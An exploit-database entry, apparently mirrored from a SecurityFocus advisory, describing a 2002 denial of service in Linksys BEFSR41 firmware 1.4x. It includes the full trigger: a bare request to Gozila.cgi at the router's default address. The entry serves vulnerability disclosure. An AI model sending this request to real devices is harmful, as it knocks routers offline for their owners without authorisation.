Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service

2002-11-01T00:00:00
ID EXPLOITPACK:7E2192CD1AF38BB7CD2D600E2D037075
Type exploitpack
Reporter Jeep 94
Modified 2002-11-01T00:00:00

Description

Linksys BEFSR41 1.4x - Gozila.cgi Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/6086/info

Linksys BEFSR41 is vulnerable to a denial of service condition.

The denial of service condition will be triggered when the device receives a request for the script file 'Gozila.cgi' without any parameters. 

http://192.168.1.1/Gozila.cgi?